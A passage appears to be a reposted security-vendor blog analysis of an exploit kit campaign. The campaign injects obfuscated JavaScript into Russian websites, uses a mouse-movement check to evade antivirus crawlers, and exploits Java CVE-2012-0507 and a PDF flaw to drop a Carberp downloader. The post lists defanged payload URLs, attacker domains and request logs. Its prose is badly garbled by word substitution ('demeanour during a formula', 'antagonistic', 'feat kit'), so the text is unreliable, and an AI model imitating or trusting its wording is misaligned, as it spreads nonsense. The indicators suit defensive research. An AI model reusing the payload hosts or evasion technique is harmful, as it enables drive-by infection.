Exploit Kit plays with intelligent redirection (amended)
This week we have rescued another engaging conflict vector. This time cybercriminals are regulating an engaging technique for stealing antagonistic Javascripts and occupy substantial iFrame injection. At this impulse we are tracking hundreds of putrescent legitimate web sites in a Russian internet shred regulating this technique of infection. Let’s investigate this conflict routine step by step. (Since bizarre announcement there have been several updates to this story and they are during a bottom of this page.)
If we demeanour during a formula on an putrescent webpage, we can find usually one javascript record reference. No antagonistic iFrame is manifest in a source formula of putrescent webpage. In a subsequent theatre of a research we downloaded this javascript formula from one of a putrescent sites (hxxp://winfield-oil.ru/javascript/script.js) for serve analysis.
After research we find a engaging javascript duty below, regulating a bizarre domain name hxxp://onj42a.qpoctushpm.is-an-actor.com/g/: this book is downloaded and executed in a subsequent proviso of a attack.
Looking inside this script, we find some unequivocally engaging results. Inside a book a large cube of formula is obfuscated with a permutative encoding algorithm.
After deobfuscation a antagonistic iFrame formula looks like this:
A formula retard inside a iFrame redirects us to a latest version of a Blackhole Nuclear Pack feat kit.
We have tracked some engaging activity by a injected formula retard with iFrame redirection: Javascript formula is used to constraint rodent activity with a onmousemove eventuality and usually after that does antagonistic activity continue with a redirection. This activity enabled us to brand a elementary routine being used to bypass crawlers used by AV companies and others. These are a initial stairs towards a criminal’s active showing of genuine user activity for tracking detections and bypassing malware collecting by whitehat crawlers.
If we demeanour during a Javascript formula for exploiting a new Java disadvantage CVE-2012-0507, we find that a remote Java applet is called regulating special parameters.
At a subsequent theatre of a exploitation process, a antagonistic java applet during hxxp://094t8g.qktsnwukvi.webhop.net//images/274e0118278c38ab7f4ef5f98b71d9dc.jar (Java/Exploit.CVE-2012-0507.J) uses these parameters for decoding an URL with executable record payload. Without this parameter, a URL can’t be decoded and a assailant can’t follow any step of theattack.
The structure of objects in a Java/Exploit.CVE-2012-0507.J representation looks like this:
The special parameter indispensable for decoding a URL (hxxp://094t8g.qktsnwukvi.webhop.net/server_privileges.php?7e9f0e75503391ed492e5abe22e1989e=2) portion a cargo (in this box it was Win32/TrojanDownloader.Carberp.AH) is found in a routine MyStart(String paramString) for a decoding algorithm.
If a Java chronicle on a customer side is not exposed afterwards a Blackhole Javascript tries instead to conflict regulating a PDF feat JS/Exploit.Pdfka.PJN (CVE-2010-0188):
Attackers hunt for ways to extend a lifetime of any obfuscation iteration or any infection of a legitimate website. It’s a healthy expansion for drive-by download attacks to embody antagonistic formula contracting active techniques for detectign genuine user activity and bypassing malware collecting systems.
All antagonistic domains during a time of announcement are hosted in a network belonging to Leksim Ltd/RELNET-NET AS5577.
It’s not a initial time this hosting provider has been concerned in such activities and in Apr final year we were already saying incidents originating from this network.
Here’s a list of a some-more active domains over 24 hours:
- yyzola.gpbbsdhmjm.shacknet.nu
- 64o5uf.inbyepkbja.dvrdns.org
- n6slis.xvseedhxey.homeftp.net
- rjohcj.gpbbsdhmjm.shacknet.nu
- q1y2fi.yuundeswvt.is-a-libertarian.com
- k82f3.neylwuugmd.est-mon-blogueur.com
- gd2wt6.kuppnoynrl.gotdns.org
- bvcydp.kuppnoynrl.gotdns.org
- 41kqki.neylwuugmd.est-mon-blogueur.com
- a0z6o.klsauvnins.dyn-o-saur.com
- lpjbikjwor.kicks-ass.net
- 3u5kj.inbyepkbja.dvrdns.org
- 86xsgn.qktsnwukvi.webhop.net
- 1rgrht.xvseedhxey.homeftp.net
- gmov4d.xvseedhxey.homeftp.net
- dkmcob.xvseedhxey.homeftp.net
- a0z6o.klsauvnins.dyn-o-saur.com
- j5pxed.xvseedhxey.homeftp.net
- cynwoltxdo.dnsdojo.org
- 094t8g.qktsnwukvi.webhop.net
Special interjection to Vladimir Kropotov, eccentric confidence researcher from Russia, for some of a information used for this post.
Aleksandr Matrosov
David Harley
Updates:
(1) Aleks reports:
On April 3rd IP’s with Blackhole migrated on a latest chronicle of Nuclear Pack.
Proof logs:
- 02/Apr/2012
GET hxxp://dx6ts.yfwumdwyei.is-a-hunter.com/g/3854063525500425.js 62.122.79.32 - 02/Apr/2012
GET hxxp://yfwumdwyei.is-a-hunter.com/main.php?page=4f086f0830a83d5f 62.122.79.32 [Blackhole] - 03/Apr/2012
GET hxxp://094t8g.qktsnwukvi.webhop.net/g/017432546059324.js 62.122.79.41 - 03/Apr/2012
GET hxxp://qktsnwukvi.webhop.net/main.php?page=4f086f0830a83d5f 62.122.79.41 [Blackhole] - 03/Apr/2012
GET hxxp://pqiyoc.qktsnwukvi.webhop.net/g/697079368134578.js 62.122.79.41 - 03/Apr/2012
GET hxxp://094t8g.qktsnwukvi.webhop.net/server_privileges.php?e843aac68e6c4d6126926e60a1781536=2 62.122.79.41 [Nuclear Pack]
(2) Steve Burn points out that AS5577 is actually Root eSolutions/Root SA: Leksim is one of their customers. A post at http://hphosts.blogspot.co.uk/2009/11/crimeware-friendly-isps-root-esolutions.html refers.
[Further update: there's a useful news of a vital Nuclear Pack-related occurrence from Fox-IT during http://blog.fox-it.com/2012/03/16/post-mortem-report-on-the-sinowallnu-nl-incident/. However, in a box that Aleksandr has been looking at, there's an updated chronicle that includes Java/Exploit.CVE-2012-0507.]
[Update: it turns out that it's not Blackhole, though Nuclear Pack Version 2.0. Our apologies for a confusion. I'm anticipating we'll have some-more information for we shortly.]
.